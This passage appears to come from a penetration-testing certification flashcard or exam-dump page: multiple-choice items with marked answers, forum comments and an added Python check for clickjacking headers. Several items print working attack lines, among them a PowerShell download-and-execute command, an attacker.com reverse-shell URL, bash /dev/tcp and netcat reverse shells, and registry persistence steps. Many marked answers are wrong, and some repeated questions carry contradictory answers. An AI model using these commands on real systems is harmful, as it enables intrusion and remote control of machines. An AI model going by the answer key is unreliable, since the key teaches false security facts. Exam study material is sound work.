D. The corporate systems must store passwords using the MD5 hashing algorithm.

100%

24
Q

Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet

Which of the following BEST describes the actions performed by this command?

A. Set the execution policy.
B. Execute a remote script.
C. Run an encoded command.
D. Instantiate an object.

A

B. Execute a remote script.

100%

25
Q

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim

A

B. Preparing a pretext

100%

26
Q

A penetration tester is performing a code review. Which of the following testing techniques is being performed?

A. Dynamic analysis
B. Fuzzing analysis
C. Static analysis
D. Run-time analysis

A

C. Static analysis

100%

27
Q

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

A. Enable HTTP Strict Transport Security.
B. Enable a secure cookie flag.
C. Encrypt the communication channel.
D. Sanitize invalid user input.

A

A. Enable HTTP Strict Transport Security.

28
Q

A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company’s intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.

B. Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.

C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.

D. Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.

A

C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.

100%

29
Q

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof

A

B. Principle of authority

100%

30
Q

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan

A

A. Discovery scan

100%

31
Q

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.

A

B. Block URL redirections.

100%

32
Q

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan

A

B. Dynamic scan

100%

33
Q

An engineer, who is conducting a penetration test for a web application, discovers the user login process sends form field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:

A. HTTP POST method.
B. HTTP OPTIONS method.
C. HTTP PUT method.
D. HTTP TRACE method.

A

A. HTTP POST method.

100%

34
Q

A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A. nmap -p 53 -oG dnslist.txt | cut -d ":" -f 4

B. nslookup -ns 8.8.8.8 << dnslist.txt

C. for x in {1..254}; do dig -x 192.168.$x.$x; done

D. dig -r > echo “8.8.8.8” >> /etc/resolv.conf

A

C. for x in {1..254}; do dig -x 192.168.$x.$x; done

100%

35
Q

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled “changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.

B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.

C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

A

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

36
Q

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

A. Perform an HTTP downgrade attack.
B. Harvest the user credentials to decrypt traffic.
C. Perform an MITM attack.
D. Implement a CA attack by impersonating trusted CAs.

A

A. Perform an HTTP downgrade attack.

37
Q

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass

A

D. Lock bypass

38
Q

The following line was found in an exploited machine’s history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0>&1

Which of the following describes what the command does?

A. Performs a port scan.
B. Grabs the web server’s banner.
C. Redirects a TTY to a remote system.
D. Removes error logs for the supplied IP.

A

A. Performs a port scan.

39
Q

Which of the following are MOST important when planning for an engagement? (Select TWO).

A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies

A

A. Goals/objectives

C. Tolerance to impact

40
Q

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack

A

B. Clickjacking attack

41
Q

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

A. perl -e ‘use SOCKET’; $i=’; $p=’443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1

A

D. bash -i >& /dev/tcp//443 0>&1

42
Q

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal

B. From the local computer, run the following command:
ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm

C. From the remote computer, run the following command:
ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 "xhost+; xterm"

D. From the local computer, run the following command:
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000

A

A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal

43
Q

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

A. Appendices
B. Executive summary
C. Technical summary
D. Main body

A

B. Executive summary

44
Q

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

A. Convert to JAR.
B. Decompile.
C. Cross-compile the application.
D. Convert JAR files to DEX.
E. Re-sign the APK.
F. Attach to ADB.

A

A. Convert to JAR.
B. Decompile.

45
Q

Which of the following commands starts the Metasploit database?

A. msfconsole

B. workspace

C. msfvenom

D. db_init

E. db_connect

A

A. msfconsole

46
Q

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

A. Manufacturers developing IoT devices are less concerned with security.

B. It is difficult for administrators to implement the same security standards across the board.

C. IoT systems often lack the hardware power required by more secure solutions.

D. Regulatory authorities often have lower security requirements for IoT systems.

A

A. Manufacturers developing IoT devices are less concerned with security.

47
Q

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

A

B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

48
Q

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register

A

A. Stack pointer register

49
Q

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file

A

D. An applicable XSD file

50
Q

Which of the following is an example of a spear phishing attack?

A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack

A

A. Targeting an executive with an SMS attack

51
Q

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

A. Cleartext exposure of SNMP trap data
B. Software bugs resident in the IT ticketing system
C. S/MIME certificate templates defined by the CA
D. Health information communicated over HTTP
E. DAR encryption on records servers

A

D. Health information communicated over HTTP
E. DAR encryption on records servers

52
Q

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test

A

A. Selection of the appropriate set of security testing tools

53
Q

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?

A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.

B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.

C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

A

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

54
Q

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10

Which of the following commands should the malicious user execute to perform the MITM attack?

A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20

A

B. arpspoof -t 192.168.1.20 192.168.1.254

55
Q

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

A. Randomize local administrator credentials for each machine.
B. Disable remote logons for local administrators.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
F. Enable full-disk encryption on every workstation.
G. Segment each host into its own VLAN.

A

C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.

56
Q

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

A. MAC address of the client
B. MAC address of the domain controller
C. MAC address of the web server
D. MAC address of the gateway

A

D. MAC address of the gateway

57
Q

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

A. Shodan
B. SET
C. BeEF
D. Wireshark
E. Maltego
F. Dynamo

A

A. Shodan

E. Maltego

58
Q

Black box penetration testing strategy provides the tester with:

A. a target list
B. a network diagram
C. source code
D. privileged credentials

A

D. privileged credentials

59
Q

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

A. Randomize the credentials used to log in.
B. Install host-based intrusion detection.
C. Implement input normalization.
D. Perform system hardening.

A

D. Perform system hardening.

60
Q

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A. Transition the application to another port.
B. Filter port 443 to specific IP addresses.
C. Implement a web application firewall.
D. Disable unneeded services.

A

D. Disable unneeded services.

61
Q

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

A. Stored XSS
B. Full path disclosure
C. Expired certificate
D. Clickjacking

A

A. Stored XSS

62
Q

A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?

A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis

A

A. Rules of engagement

63
Q

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A. arpspoof
B. nmap
C. responder
D. burpsuite

A

B. nmap

64
Q

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?

A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence

A

A. To remove the persistence

65
Q

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

B. Identify the issues that can be remediated most quickly and address them first.

C. Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities.

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.

A

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.

66
Q

Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO.)

A. The tester discovers personally identifiable data on the system.
B. The system shows evidence of prior unauthorized compromise.
C. The system shows a lack of hardening throughout.
D. The system becomes unavailable following an attempted exploit.
E. The tester discovers a finding on an out-of-scope system.

A

B. The system shows evidence of prior unauthorized compromise.

D. The system becomes unavailable following an attempted exploit.

67
Q

Which of the following tools is used to perform a credential brute force attack?

A. Hydra
B. John the Ripper
C. Hashcat
D. Peach

A

A. Hydra

68
Q

A penetration tester has gained access to a marketing employee’s device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.
B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
D. Create a fake service in Windows called RTAudio to execute manually.
E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
F. Create a scheduled task to call C:\windows\system32\drivers\etc\hosts.

A

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

69
Q

A security analyst was provided with a detailed penetration report, which was performed against the organization’s DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability?

A. Very difficult; perimeter systems are usually behind a firewall.
B. Somewhat difficult; would require significant processing power to exploit.
C. Trivial; little effort is required to exploit this finding.
D. Impossible; external hosts are hardened to protect against attacks.

A

C. Trivial; little effort is required to exploit this finding.

70
Q

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A. ICS vendors are slow to implement adequate security controls.
B. ICS staff are not adequately trained to perform basic duties.
C. There is a scarcity of replacement equipment for critical devices.
D. There is a lack of compliance for ICS facilities.

A

B. ICS staff are not adequately trained to perform basic duties.

71
Q

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?

A. The physical location and network ESSIDs to be tested
B. The number of wireless devices owned by the client
C. The client’s preferred wireless access point vendor
D. The bands and frequencies used by the client’s devices

A

A. The physical location and network ESSIDs to be tested

72
Q

A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

A. Obsolete software may contain exploitable components.

B. Weak password management practices may be employed.

C. Cryptographically weak protocols may be intercepted.

D. Web server configurations may reveal sensitive information.

A

D. Web server configurations may reveal sensitive information.

100%

73
Q

A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two).

A. -O

B. -iL

C. -V

D. -sS

E. -oN

F. -oX

A

A. -O

B. -iL

100%

74
Q

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

A. nc -l -p 4444 /bin/bash

B. nc -vp 4444 /bin/bash

C. nc -p 4444 /bin/bash

D. nc -lp 4444 /bin/bash

A

D. nc -lp 4444 /bin/bash

100%

75
Q

In which of the following scenarios would a tester perform a Kerberoasting attack?

A. The tester has compromised a Windows device and dumps the LSA secrets.

B. The tester needs to retrieve the SAM database and crack the password hashes.

C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.

A

C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

100%

76
Q

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A. Download the GHOST file to a Linux system and compile gcc -o GHOST test i: ./GHOST

B. Download the GHOST file to a Windows system and compile gcc -o GHOST GHOST.c test i: ./GHOST

C. Download the GHOST file to a Linux system and compile gcc -o GHOST.c test i: ./GHOST

D. Download the GHOST file to a Windows system and compile gcc -o GHOST test i: ./GHOST

A

C. Download the GHOST file to a Linux system and compile gcc -o GHOST.c test i: ./GHOST

100%

77
Q

The following line was found in an exploited machine’s history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0>&1
Which of the following describes what the command does?

A. Performs a port scan.

B. Grabs the web server’s banner.

C. Redirects a TTY to a remote system.

D. Removes error logs for the supplied IP.

A

C. Redirects a TTY to a remote system.

100%

78
Q

A penetration tester ran the following Nmap scan on a computer: nmap -sV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open, with SSH identified as the service on port 23.
Which of the following is the BEST explanation for what happened?

A. The organization failed to disable Telnet.

B. Nmap results contain a false positive for port 23.

C. Port 22 was filtered.

D. The service is running on a non-standard port.

A

D. The service is running on a non-standard port.

100%

79
Q

A penetration tester has gained access to a marketing employee’s device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.

C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

D. Create a fake service in Windows called RTAudio to execute manually.

E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.

F. Create a scheduled task to call C:\windows\system32\drivers\etc\hosts.

A

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

100%

80
Q

DRAG DROP -
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
Select and Place:

A

mr_robot

4 months ago

Not sure about this one, the code looks incomplete for me like why 2 loops? But I would guess: 1 - #!/usr/bin/python 2- ports = [21,22] 3- for port in ports: … 4- run_scan(sys.argv[1], ports)

upvoted 6 times

terrylai2010

3 months, 2 weeks ago

Agreed. As the “import xxx” should belong to the Python language, but not to Ruby.

upvoted 2 times

D1960

2 months, 3 weeks ago

For step 3: 3- for port in ports: … I am not certain which block you mean. There are two blocks that start with that.

upvoted 1 times

D1960

2 months, 3 weeks ago

I have been working with this quite a lot. Aside from the numerous typos, this script is badly designed, and will not work as shown. That said, I think the best answers are: 1 - #!/usr/bin/python 2 - ports = [21,22] 3 - port_scan(ip, ports) 4 - for port in ports: … The ‘s’ and the ‘ip’ must be defined for the ‘for loop’ to run correctly. The ‘s’ and the ‘ip’ are defined in the ‘port_scan’ function. Therefore the ‘port_scan’ must be run before the ‘for loop’ The function is badly messed-up, and should not be there at all. Instead of the function, these lines should be included: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ip = sys.argv[1] The function is also not called correctly. Still that comes closest to actually working.

upvoted 1 times

D1960

2 months, 3 weeks ago

Unless the for-loop is inside the function. Then it would be: 1 - #!/usr/bin/python 2- ports = [21,22] 3- for port in ports: … 4- run_scan(sys.argv[1], ports)

upvoted 1 times

Tom_Catman

1 month, 2 weeks ago

Just realize it might be $port in $ports, not S but $

upvoted 1 times

mr_robot

1 month, 2 weeks ago

I am not a coder so correct me if I am wrong. This is clearly a Python code because: Python uses “import” vs Ruby uses “require” Python uses “print” vs Ruby uses “puts” Python uses variables like “port=21” vs Ruby has different types of variables and if we were to use a variable starting with “$” (Global variables begin with $) we would need to create a class. (https://www.tutorialspoint.com/ruby/ruby_variables.htm) So I would still stick with the below: 1 - #!/usr/bin/python 2- ports = [21,22] 3- for port in ports: … 4- run_scan(sys.argv[1], ports) Now what if the exam there is no #!/usr/bin/python but only #!/usr/bin/ruby ?

upvoted 2 times

81
Q

In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

A. Brute force the user’s password.

B. Perform an ARP spoofing attack.

C. Leverage the BeEF framework to capture credentials.

D. Conduct LLMNR/NETBIOS-ns poisoning.

A

D. Conduct LLMNR/NETBIOS-ns poisoning

100%

D1960

5 months ago

“A” seems to make sense. But according to Sybex Comptia PenTest+ Practice Test - Chapter 3 Question 190: the answer is “D”

upvoted 1 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX D. - Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.

upvoted 1 times

MikeHunt

3 months, 2 weeks ago

brute forcing the system will lock it out and cause suspicion. But if you MITM the system and wait for the user to authenticate the system will send a user/hash out that can be used to either replay or brute force offline

upvoted 1 times

D1960

3 months, 2 weeks ago

If I have physical access to your laptop, but I cannot login, then how do I MITM the system?

upvoted 1 times

D1960

3 months, 2 weeks ago

If I have physical access, I can - possibly - reboot the system to a cdrom or thumbdrive with John-the-Ripper on it. Using that I can gain the user’s local credentials. I have actually done this for users that forgot their passwords.

upvoted 1 times

mr_robot

1 month, 3 weeks ago

Agree. If you have already physical access to the laptop, you don’t need to conduct LLMNR/NETBIOS-ns poisoning by MITM to the device. I would go with A. https://bit.ly/2YmpsFg https://www.aptive.co.uk/blog/llmnr-nbt-ns-spoofing/ https://attack.mitre.org/techniques/T1171/

upvoted 2 times

mr_robot

1 month, 2 weeks ago

Even if you wait for the user to log back in to the machine you still need to rely on the user to mistype a server connection (like a typo from a share ex: \fileserser) in order for the LLMNR/NETBIOS-ns poisoning attack to work. You could use something like this for a brute forcing attack : https://bit.ly/3eFXYjI

82
Q

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?

A. Forced browsing vulnerability

B. Parameter pollution vulnerability

C. File upload vulnerability

D. Cookie enumeration

A

D. Cookie enumeration

100%

mr_robot

4 months, 1 week ago

Probably D? I believe the pentester is trying to use cookie enumeration in order to guess a session ID from an user who has got access to files from that specific area of the site - RTSdocuments. “PHPSESSID – The PHPSESSID cookie is native to PHP and enables websites to store serialised state data. It is used to establish a user session and to pass state data via a temporary cookie, which is commonly referred to as a session cookie. (expires when you close your browser).” https://www.catchments.ie/cookie-policy/ https://www.netsparker.com/blog/web-security/cross-site-cookie-manipulation/ I don’t think it’s A because there are no variables from user details in the link in order to get access to RTSdocuments.

upvoted 2 times

mr_robot

2 months, 4 weeks ago

Just some more examples. Cookie Enumeration: https://0x00sec.org/t/stealing-cookies-for-fun-and-profit-phpsessid-theory/1607 Forced browsing vulnerability https://owasp.org/www-community/attacks/Forced_browsing https://campus.barracuda.com/product/webapplicationfirewall/doc/42049348/forced-browsing-attack/ Parameter pollution vulnerability https://www.imperva.com/learn/application-security/http-parameter-pollution/ File upload vulnerability https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

upvoted 1 times

mr_robot

2 months, 1 week ago

Digging deeper into this, I believe this is more like A - Forced browsing vulnerability. The attacker is trying to guess a restricted page in order to have access to it - https://www.test.com/Bank/Tax/RTSdocuments/ “Forced browsing vulnerabilities occur when hidden privileged resources are directly accessible through their URL. A forced browsing vulnerability exists if a privileged page is not guarded and thus reachable through forced browsing. Often, this kind of vulnerability occurs when developers try to “hide” a page by only displaying protected links to that page. In these cases, a malicious unprivileged user might be able to perform a privilege escalation attack by correctly guessing the URL of the “hidden” page.”

upvoted 2 times

mr_robot

2 months, 1 week ago

At the same time, this looks like a clear example of cookie enumeration so I am not really sure which one is the correct answer for this. Any thoughts? https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions https://bit.ly/2AlKWZF

upvoted 1 times

Tom_Catman

1 month, 2 weeks ago

It’s a POST request. Forced browsing usually are GET requests.

upvoted 1 times

boblee

1 month, 3 weeks ago

the answer is A.

83
Q

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1
Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

A. nc -nlvp 443

B. nc 10.2.4.6. 443

C. nc -w3 10.2.4.6 443

D. nc -e /bin/sh 10.2.4.6. 443

A

A. nc -nlvp 443

100%

84
Q

A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

A. Use path modification to escape the application’s framework.

B. Create a frame that overlays the application.

C. Inject a malicious iframe containing JavaScript.

D. Pass an iframe attribute that is malicious.

A

B. Create a frame that overlays the application

100%
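
Added example for Q84 (not from the flashcards): a check a tester can run over captured response headers to decide whether a page can be framed. A missing X-Frame-Options header lets an attacker load the application in an invisible iframe and overlay it with their own UI (clickjacking), which is answer B. The check also accounts for a CSP frame-ancestors directive, which browsers honour in preference to X-Frame-Options when both are present, and for the obsolete ALLOW-FROM value. The header dictionaries in the test are constructed.

```python
def clickjacking_protection(headers):
    """Decide whether a response can be framed by a third-party page.

    headers: dict of response header name -> value (names matched case-insensitively).
    Returns (protected, reason). A CSP frame-ancestors directive takes precedence
    over X-Frame-Options in every browser that understands CSP, so it is checked first.
    """
    lower = {k.lower(): v for k, v in headers.items()}

    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [p.lower().strip("'") for p in parts[1:]]
            if not sources or "*" in sources:
                return False, "frame-ancestors allows any origin"
            return True, "CSP frame-ancestors " + " ".join(sources)

    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return True, "X-Frame-Options " + xfo
    if xfo.startswith("ALLOW-FROM"):
        return False, "X-Frame-Options ALLOW-FROM is obsolete; current browsers ignore it"
    if xfo:
        return False, f"unrecognised X-Frame-Options value {xfo!r} is ignored"
    return False, "no framing restriction: an attacker's page can load this in an invisible iframe"


if __name__ == "__main__":
    samples = {                                             # constructed responses
        "no header": {"Content-Type": "text/html"},
        "xfo": {"X-Frame-Options": "SAMEORIGIN"},
        "csp": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
        "allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    }
    for label, hdrs in samples.items():
        print(label, clickjacking_protection(hdrs))
```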

85
Q

A security analyst was provided with a detailed penetration report, which was performed against the organization’s DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability?

A. Very difficult; perimeter systems are usually behind a firewall.

B. Somewhat difficult; would require significant processing power to exploit.

C. Trivial; little effort is required to exploit this finding.

D. Impossible; external hosts are hardened to protect against attacks.

A

C. Trivial; little effort is required to exploit this finding.

100%

86
Q

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A. arpspoof

B. nmap

C. responder

D. burpsuite

A

C. responder

100%

87
Q

A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

B. nslookup -ns 8.8.8.8 << dnslist.txt

C. for x in {1..254}; do dig -x 192.168.$x.$x; done

D. dig -r > echo “8.8.8.8” >> /etc/resolv.conf

A

C. for x in {1..254}; do dig -x 192.168.$x.$x; done

100%
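
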